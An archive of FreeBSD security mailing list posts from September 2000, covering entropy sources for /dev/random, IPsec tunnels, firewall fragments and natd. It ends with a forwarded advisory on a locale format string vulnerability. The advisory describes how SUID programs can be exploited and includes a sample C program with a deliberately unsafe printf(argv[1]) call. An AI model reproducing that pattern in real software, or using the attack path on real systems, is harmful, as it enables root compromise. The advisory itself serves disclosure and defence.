Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id B315E37B424; Mon, 4 Sep 2000 05:44:37 -0700 (PDT)
Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id MAA03727; Mon, 4 Sep 2000 12:44:28 GMT
Message-ID: <39B3992B.7B823DEE@algroup.co.uk>
Date: Mon, 04 Sep 2000 13:44:28 +0100
From: Adam Laurie
Organization: A.L. Group plc
X-Mailer: Mozilla 4.72 [en] (Win95; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: James Wyatt , Garrett Wollman , Adam Back , security@FreeBSD.org
Subject: Re: yarrow & /dev/random
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Kris Kennaway wrote:
>
> On Sun, 27 Aug 2000, James Wyatt wrote:
>
> > On servers with no regular keyboard or mouse use, there is usually enough
> > entropy in the disk and network IO to serve the purpose. Small servers
> > with low net and disk entropy often get used as consoles for busier
> > servers. Your mileage may vary, of course. What other sources of entropy
> > might one consider? Maybe an AM radio tuned to static hooked into
> > /dev/audio to get random samples? - Jy@
>
> My observations suggest that a sound card tuned to maximum input gain with
> no microphone input (i.e. sampling noise in the card) is a very good
> source of randomness, with at least 6 bits of entropy per 16 bit sample
> for most cards, which can be sampled at 44Khz (i.e. about 32 kilobytes of
> randomness per second, far in excess of what Yarrow needs).
>
> More than enough for even heavy server needs.

This is only safe to do if you can guarantee that your sound card is
protected from outside influence - e.g. radio transmissions putting
known noise into your data. TEMPEST shielding would be a good start.

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.
Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Mon Sep 4 7: 3:56 2000
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0F4C337B422 for ; Mon, 4 Sep 2000 07:03:46 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA22734; Mon, 4 Sep 2000 07:02:30 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda22732; Mon Sep 4 07:02:11 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA64913; Mon, 4 Sep 2000 07:02:10 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdR64911; Mon Sep 4 07:01:11 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e84E1Bp23058; Mon, 4 Sep 2000 07:01:11 -0700 (PDT)
Message-Id: <200009041401.e84E1Bp23058@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdg23052; Mon Sep 4 07:00:44 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: cjclark@alum.mit.edu
Cc: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>, freebsd-security@FreeBSD.ORG
Subject: Re: SOS Help ipsec (Esp Ah)
In-reply-to: Your message of "Sun, 03 Sep 2000 22:15:56 PDT." <20000903221556.R62475@149.211.6.64.reflexcom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 04 Sep 2000 07:00:44 -0700

In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J . Clark " writes:
> On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote:
> >
> > Dear All,
> >
> > I am running into trouble. I am using tun0 as tunnel of a secure
> > communication via ESP. I want also to use AH as another reliable kind of
> > communication so I thought about using it via tun1. When I wanted to
> > create tun1, i.e. (I went to GENERIC and modified the number of tunnels
> > from 1 to 2) and I wanted to recompile the kernel, I had a recompilation
> > error due to some patch that I applied to my kernel previously.
> > Well the thing is that I can not use point to point links i.e. sl0, pp0.
> > Due to time limitations I can not reinstall another kernel.
> >
> > My question is:
> > Do you have any idea on how I can overpass this situation ?
>
> Well, you should not need tun(4) devices at all to do IPsec.

He would if he's using the pipsecd port.

He hasn't told us what software he's using, so we don't have enough
information to comment about his problem.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Mon Sep 4 8: 5: 1 2000
Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 2771C37B423 for ; Mon, 4 Sep 2000 08:04:50 -0700 (PDT)
Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id OAA02953; Mon, 4 Sep 2000 14:58:41 GMT
Date: Mon, 4 Sep 2000 14:58:40 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: Cy Schubert - ITSD Open Systems Group
Cc: cjclark@alum.mit.edu, freebsd-security@FreeBSD.ORG
Subject: Re: SOS Help ipsec (Esp Ah)
In-Reply-To: <200009041401.e84E1Bp23058@cwsys.cwsent.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Dear all,
Yes indeed I am using the pipsecd port

Thank you in Advance,

Ali Alaoui El Hassani.

On Mon, 4 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:

> In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J . Clark " writes:
> > On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote:
> > >
> > > Dear All,
> > >
> > > I am running into trouble. I am using tun0 as tunnel of a secure
> > > communication via ESP. I want also to use AH as another reliable kind of
> > > communication so I thought about using it via tun1. When I wanted to
> > > create tun1, i.e. (I went to GENERIC and modified the number of tunnels
> > > from 1 to 2) and I wanted to recompile the kernel, I had a recompilation
> > > error due to some patch that I applied to my kernel previously.
> > > Well the thing is that I can not use point to point links i.e. sl0, pp0.
> > > Due to time limitations I can not reinstall another kernel.
> > >
> > > My question is:
> > > Do you have any idea on how I can overpass this situation ?
> >
> > Well, you should not need tun(4) devices at all to do IPsec.
>
> He would if he's using the pipsecd port.
>
> He hasn't told us what software he's using, so we don't have enough
> information to comment about his problem.
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC

From owner-freebsd-security Mon Sep 4 9:25:53 2000
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 602A637B422; Mon, 4 Sep 2000 09:25:51 -0700 (PDT)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA08127; Mon, 4 Sep 2000 10:25:47 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA14327; Mon, 4 Sep 2000 10:25:45 -0600 (MDT) (envelope-from nate)
Date: Mon, 4 Sep 2000 10:25:45 -0600 (MDT)
Message-Id: <200009041625.KAA14327@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Darren Reed
Cc: nate@yogotech.com, billf@chimesnet.com (Bill Fumerola), rwatson@FreeBSD.ORG (Robert Watson), dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
In-Reply-To: <200009040345.OAA24476@cairo.anu.edu.au>
References: <200009040233.UAA12035@nomad.yogotech.com> <200009040345.OAA24476@cairo.anu.edu.au>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)

> > > > It never reassembles and doesn't hold them in a buffer until they're
> > > > all received either.
> > >
> > > Which I still think is the proper behavior for both ipfw and ipfilter.
> >
> > I can think of some trivially easy DoS attacks if this is done...
>
> Ummm, what exactly would you be inflicting a DoS attack on ?

The firewall.
Nate

From owner-freebsd-security Mon Sep 4 10:24:54 2000
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id EFC9737B423 for ; Mon, 4 Sep 2000 10:24:50 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA23160; Mon, 4 Sep 2000 10:23:56 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda23158; Mon Sep 4 10:23:51 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA65547; Mon, 4 Sep 2000 10:23:51 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdv65545; Mon Sep 4 10:23:17 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e84HNGQ23967; Mon, 4 Sep 2000 10:23:16 -0700 (PDT)
Message-Id: <200009041723.e84HNGQ23967@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdG23963; Mon Sep 4 10:22:31 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: Cy Schubert - ITSD Open Systems Group , cjclark@alum.mit.edu, freebsd-security@FreeBSD.ORG
Subject: Re: SOS Help ipsec (Esp Ah)
In-reply-to: Your message of "Mon, 04 Sep 2000 14:58:40 -0000."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 04 Sep 2000 10:22:30 -0700

In message , Ali Alaoui El Hassani writes:
> Dear all,
> Yes indeed I am using the pipsecd port
>
> Thank you in Advance,
>
> Ali Alaoui El Hassani.
>

You still haven't told us much about the software you're using. What
release of FreeBSD are you using? (From your description of the problem
you might be using 2.x or 3.x.) What's in your kernel config? How do you
start pipsecd? What's in your pipsecd.conf file (don't list your
passwords)? ...

Just a guess (still don't know what software you're using but assuming
FreeBSD 2.x or 3.x), but increase the number of tun devices from 2 to 4.
Pipsecd uses 2 tun devices per VPN tunnel.

As a cautionary note, not providing all of the relevant background
information to solve a problem will result in no solution and possibly
even insults.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

> On Mon, 4 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:
>
> > In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J . Clark " writes:
> > > On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote:
> > > >
> > > > Dear All,
> > > >
> > > > I am running into trouble. I am using tun0 as tunnel of a secure
> > > > communication via ESP. I want also to use AH as another reliable kind of
> > > > communication so I thought about using it via tun1.
> > > > When I wanted to
> > > > create tun1, i.e. (I went to GENERIC and modified the number of tunnels
> > > > from 1 to 2) and I wanted to recompile the kernel, I had a recompilation
> > > > error due to some patch that I applied to my kernel previously.
> > > > Well the thing is that I can not use point to point links i.e. sl0, pp0.
> > > > Due to time limitations I can not reinstall another kernel.
> > > >
> > > > My question is:
> > > > Do you have any idea on how I can overpass this situation ?
> > >
> > > Well, you should not need tun(4) devices at all to do IPsec.
> >
> > He would if he's using the pipsecd port.
> >
> > He hasn't told us what software he's using, so we don't have enough
> > information to comment about his problem.
> >
> > Regards,                       Phone:  (250)387-8437
> > Cy Schubert                    Fax:    (250)387-5766
> > Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
> > Open Systems Group, ITSD, ISTA
> > Province of BC

From owner-freebsd-security Mon Sep 4 10:36:41 2000
Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id F0FD237B423; Mon, 4 Sep 2000 10:36:39 -0700 (PDT)
Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 5042E1C5C; Mon, 4 Sep 2000 13:36:39 -0400 (EDT)
Date: Mon, 4 Sep 2000 13:36:39 -0400
From: Bill Fumerola
To: Nate Williams
Cc: Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000904133639.V33771@jade.chc-chimes.com>
References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <200009040233.UAA12035@nomad.yogotech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <200009040233.UAA12035@nomad.yogotech.com>; from nate@yogotech.com on Sun, Sep 03, 2000 at 08:33:53PM -0600
X-Operating-System: FreeBSD 3.3-STABLE i386

On Sun, Sep 03, 2000 at 08:33:53PM -0600, Nate Williams wrote:
> > > It never reassembles and doesn't hold them in a buffer until they're
> > > all received either.
> >
> > Which I still think is the proper behavior for both ipfw and ipfilter.
>
> I can think of some trivially easy DoS attacks if this is done...

I meant in my original message "I think the current behavior of holding
not reassembling and not holding them in a buffer is the proper behavior
for both ipfw and ipfilter".

I was agreeing with darrenr.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From owner-freebsd-security Mon Sep 4 10:38:45 2000
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id B0B8D37B422; Mon, 4 Sep 2000 10:38:42 -0700 (PDT)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id LAA09314; Mon, 4 Sep 2000 11:38:28 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id LAA14631; Mon, 4 Sep 2000 11:38:28 -0600 (MDT) (envelope-from nate)
Date: Mon, 4 Sep 2000 11:38:28 -0600 (MDT)
Message-Id: <200009041738.LAA14631@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Bill Fumerola
Cc: Nate Williams , Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
In-Reply-To: <20000904133639.V33771@jade.chc-chimes.com>
References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <200009040233.UAA12035@nomad.yogotech.com> <20000904133639.V33771@jade.chc-chimes.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)

> > > > It never reassembles and doesn't hold them in a buffer until they're
> > > > all received either.
> > >
> > > Which I still think is the proper behavior for both ipfw and ipfilter.
> >
> > I can think of some trivially easy DoS attacks if this is done...
>
> I meant in my original message "I think the current behavior of holding
> not reassembling and not holding them in a buffer is the proper behavior
> for both ipfw and ipfilter".
>
> I was agreeing with darrenr.

Oh. Then I agree with you.
:)

Nate

From owner-freebsd-security Mon Sep 4 14:36:38 2000
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB34737B42C; Mon, 4 Sep 2000 14:36:30 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA66872; Mon, 4 Sep 2000 14:36:30 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Mon, 4 Sep 2000 14:36:30 -0700 (PDT)
From: Kris Kennaway
To: Adam Laurie
Cc: James Wyatt , Garrett Wollman , Adam Back , security@FreeBSD.org
Subject: Re: yarrow & /dev/random
In-Reply-To: <39B3992B.7B823DEE@algroup.co.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Mon, 4 Sep 2000, Adam Laurie wrote:

> Kris Kennaway wrote:
> >
> > On Sun, 27 Aug 2000, James Wyatt wrote:
> >
> > > On servers with no regular keyboard or mouse use, there is usually enough
> > > entropy in the disk and network IO to serve the purpose. Small servers
> > > with low net and disk entropy often get used as consoles for busier
> > > servers. Your mileage may vary, of course. What other sources of entropy
> > > might one consider? Maybe an AM radio tuned to static hooked into
> > > /dev/audio to get random samples? - Jy@
> >
> > My observations suggest that a sound card tuned to maximum input gain with
> > no microphone input (i.e. sampling noise in the card) is a very good
> > source of randomness, with at least 6 bits of entropy per 16 bit sample
> > for most cards, which can be sampled at 44Khz (i.e. about 32 kilobytes of
> > randomness per second, far in excess of what Yarrow needs).
> >
> > More than enough for even heavy server needs.
>
> This is only safe to do if you can guarantee that your sound card is
> protected from outside influence - e.g. radio transmissions putting
> known noise into your data. TEMPEST shielding would be a good start.

If interference from men in black is part of your threat model ;-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Mon Sep 4 16:39:40 2000
Received: from alcanet.com.au (mail.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with SMTP id 4DBF837B422; Mon, 4 Sep 2000 16:39:34 -0700 (PDT)
Received: by border.alcanet.com.au id <115204>; Tue, 5 Sep 2000 10:39:05 +1000
Content-return: prohibited
Date: Tue, 05 Sep 2000 10:39:21 +1100
From: Peter Jeremy
Subject: Re: yarrow & /dev/random
In-reply-to: ; from kris@FreeBSD.ORG on Mon, Sep 04, 2000 at 02:36:30PM -0700
To: Kris Kennaway
Cc: Adam Laurie , security@FreeBSD.ORG
Mail-followup-to: Kris Kennaway , Adam Laurie , security@FreeBSD.ORG
Message-Id: <00Sep5.103905est.115204@border.alcanet.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.4i
References: <39B3992B.7B823DEE@algroup.co.uk>

On 2000-Sep-04 14:36:30 -0700, Kris Kennaway wrote:
>On Mon, 4 Sep 2000, Adam Laurie wrote:
>> This is only safe to do if you can guarantee that your sound card is
>> protected from outside influence - e.g. radio transmissions putting
>> known noise into your data. TEMPEST shielding would be a good start.
>
>If interference from men in black is part of your threat model ;-)

I don't think that follows. For a soundcard to produce useful entropy,
you are relying on its output being primarily thermal noise. Even
without deliberate tampering by MIB, the soundcard output can be
affected by ambient electrical noise: 50/60Hz line noise and
power-supply inverter noise are the most likely culprits in a PC. If
you are located close to a radio transmitter, the transmitter can
affect the output.

Peter

From owner-freebsd-security Mon Sep 4 22:35: 7 2000
Received: from core.schoolnet.sc.ug (wawa.eahd.or.ug [216.129.132.164]) by hub.freebsd.org (Postfix) with ESMTP id 4F3CB37B42C for ; Mon, 4 Sep 2000 22:35:02 -0700 (PDT)
Received: from localhost (begj@localhost) by core.schoolnet.sc.ug (8.9.3/8.9.3/SuSE Linux 8.9.3-0.1) with ESMTP id IAA03251 for ; Tue, 5 Sep 2000 08:38:22 +0300
Date: Tue, 5 Sep 2000 08:38:21 +0300 (EAT)
From:
To: freebsd-security@freebsd.org
Subject: Natd
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

I'm quite new to Network Address Translation on FreeBSD 4.1-Stable but I
managed to get it running and I now use that box as a gateway. One thing
that perturbs me is the message that natd gives saying that it "failed to
write a packet back. Host is down"

Can anyone shed some light on this or give me a few directions on where to
find the info on this?

From owner-freebsd-security Mon Sep 4 22:57:37 2000
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 82ABD37B423 for ; Mon, 4 Sep 2000 22:57:35 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Mon, 4 Sep 2000 22:56:02 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id WAA00344; Mon, 4 Sep 2000 22:57:05 -0700 (PDT) (envelope-from cjc)
Date: Mon, 4 Sep 2000 22:57:04 -0700
From: "Crist J . Clark"
To: begj@core.schoolnet.sc.ug
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Natd
Message-ID: <20000904225704.C69158@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from begj@core.schoolnet.sc.ug on Tue, Sep 05, 2000 at 08:38:21AM +0300

On Tue, Sep 05, 2000 at 08:38:21AM +0300, begj@core.schoolnet.sc.ug wrote:
> I'm quite new to Network Address Translation on FreeBSD 4.1-Stable but I
> managed to get it running and I now use that box as a gateway. One thing
> that perturbs me is the message that natd gives saying that it "failed to
> write a packet back. Host is down"

IIRC, that is what you get when the ARP fails for a local machine. In
other words, you most frequently see it when (a) you try to talk to a
local host that is not there, (b) that local host is misconfigured or
broken, (c) your machine is broken, or (d) there is something physically
wrong with the connection on the LAN.
--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Tue Sep 5 5:58:35 2000
Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id CED4137B424 for ; Tue, 5 Sep 2000 05:58:30 -0700 (PDT)
Received: from netrinsics.com([202.108.133.65]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm4e39b51bdd; Tue, 5 Sep 2000 12:58:43 -0000
Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e85Cx2W08046 for security@Freebsd.org; Tue, 5 Sep 2000 20:59:02 +0800 (+0800) (envelope-from robinson)
Date: Tue, 5 Sep 2000 20:59:02 +0800 (+0800)
From: Michael Robinson
Message-Id: <200009051259.e85Cx2W08046@netrinsics.com>
To: security@Freebsd.org
Subject: Re: yarrow & /dev/random

Peter Jeremy writes:
>For a soundcard to produce useful entropy,
>you are relying on its output being primarily thermal noise.

"Useful entropy" is redundant. If you have 512 bits of entropy and mix it with a megabyte of non-entropy, you still have 512 bits of entropy. The only thing you are relying on is the quality of your mixing function, and the fact that entropy is going into your entropy pool faster than it is coming out. If 12 bits * 16 kHz sampling only generates 512 bits of actual randomness per second, that's still 512 "useful entropy" bits per second.

-Michael Robinson

From owner-freebsd-security Tue Sep 5 6:55: 2 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E274237B424; Tue, 5 Sep 2000 06:54:51 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA26242; Tue, 5 Sep 2000 06:54:50 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda26238; Tue Sep 5 06:54:47 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA70623; Tue, 5 Sep 2000 06:54:46 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdD70621; Tue Sep 5 06:54:43 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e85Dshb28813; Tue, 5 Sep 2000 06:54:43 -0700 (PDT)
Message-Id: <200009051354.e85Dshb28813@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdh28809; Tue Sep 5 06:54:31 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: UNIX locale format string vulnerability (fwd)
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Mime-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Date: Tue, 05 Sep 2000 06:54:31 -0700

Wouldn't a FreeBSD system with Linux compatibility being utilised be vulnerable too?

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message

[header lines deleted]
Message-ID: <39B3E1A6.F47BBFE4@core-sdi.com>
Date: Mon, 4 Sep 2000 21:07:14 -0300
Reply-To: Iván Arce
Sender: Bugtraq List
From: Iván Arce
Organization: CORE SDI S.A.
Subject: UNIX locale format string vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM
[header lines deleted]

CORE SDI
http://www.core-sdi.com

UNIX locale format string vulnerability

Date Published: September 4th, 2000 (early release)
Advisory ID: CORE-090400
Bugtraq ID: 1634
CVE CAN: None currently assigned.
Title: UNIX locale format string vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes (on some systems)
Locally Exploitable: Yes

Vulnerability Description:

This report is being released earlier (it was originally scheduled for Sept 11th, 2000) due to the fact that information regarding the vulnerability has been made public by several vendors.

Many UNIX operating systems provide internationalization support according to the X/Open XPG3, XPG4 and Sun/Uniforum specifications using the locale subsystem. The locale subsystem comprises a set of databases that store language and country specific information and a set of library functions used to store, retrieve and generally manage that information. In particular a database with messages used by almost all the operating system programs is kept for each supported language. The programs access this database using the gettext(3), dgettext(3), dcgettext(3) C functions (Sun/Uniforum specifications) or catopen(3), catgets(3) and catclose(3) (X/Open XPG3 and XPG4 specification).

Generally a program that needs to display a message to the user will obtain the proper language specific string from the database using the original message as the search key and printing the results using the printf(3) family of functions. By building and installing a custom messages database an attacker can control the output of the message retrieval functions that get fed to the printf(3) functions.
Bad coding practices and the ability to feed format strings to the latter functions make it possible for an attacker to execute arbitrary code as a privileged user (root) using almost any SUID program on the vulnerable systems.

Alternatively, on some operating systems, the problem can be exploited remotely using the environment variable passing options in telnetd. However, a remote attacker must be able to place the suitable messages database on the target host (i.e. anonymous ftp, NFS, email, etc.)

Vulnerable Packages/Systems:

Sun Microsystems Inc.
  Solaris 2.x, Solaris 7, Solaris 8 (x86 and Sparc architectures)
Silicon Graphics Inc.
  IRIX 6.2 to 6.5.8
Linux
  RedHat Linux
  Debian Linux
  Conectiva Linux 4.0 or higher
    All supported versions of Conectiva Linux use Glibc 2.1.1 which explicitly checks and ignores the NLSPATH environment variable if the catopen() and catgets() functions are called from a SUID executable. Verified and reported by Andreas Hasenak

Although the above text is the result of research and email communications that took place during the last 2 weeks, the release of security advisories from RedHat, Debian and Conectiva Linux acknowledging the existence of the problem seems to prove otherwise.

Suspected vulnerable [not checked]
  AIX
  HP-UX
  Tru64 (Digital Unix)
  SCO OpenServer
  SCO Unixware

Systems not vulnerable
  OpenBSD
    As reported by Theo deRaadt
  FreeBSD
    As reported by Kris Kennaway
    FreeBSD does not allow the use of the NLSPATH environment variable in privileged (SUID) applications. FreeBSD can not be exploited remotely either, since the /usr/bin/login program does not use the cat* functions and is SUID root.
Solution/Vendor Information/Workaround:

RedHat Linux
  Refer to the RedHat Linux announce: http://www.securityfocus.com/archive/1/79944
Debian Linux
  Obtain patches from http://www.debian.org/security
  Refer to the Debian announce: http://www.securityfocus.com/archive/1/79943
Conectiva Linux
  Refer to the Conectiva Linux announce http://www.securityfocus.com/archive/1/79960
Other vendors
  Contact vendor for a fix

Vendor notified on: All vendors were notified on August 22nd, 2000

Credits:

This vulnerability was discovered by Ivan Arce of CORE SDI S.A., Buenos Aires, Argentina.

This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp@securityfocus.com.

Technical Description - Exploit/Concept Code:

Passing unchecked user supplied data as a format string to the printf(3) functions can lead to unexpected changes of flow control and execution of arbitrary code in context of the vulnerable program. The following C program exemplifies the problem described:

-----sample.c-----
#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc < 2)
        return 1;

    /* This is proper use */
    printf("%s\n", argv[1]);

    /* This is bad use: argv[1] itself becomes the format string */
    printf(argv[1]);
    printf("\n");

    return 0;
}
------------------

In the above example if argv[1] is a string with characters interpreted by printf(3) as formatting characters, the behavior of the program can be altered to execute arbitrary code in a way _similar_ to the exploitation of buffer overflow vulnerabilities:

$ cc -o sample sample.c
$ ./sample hello
hello
hello
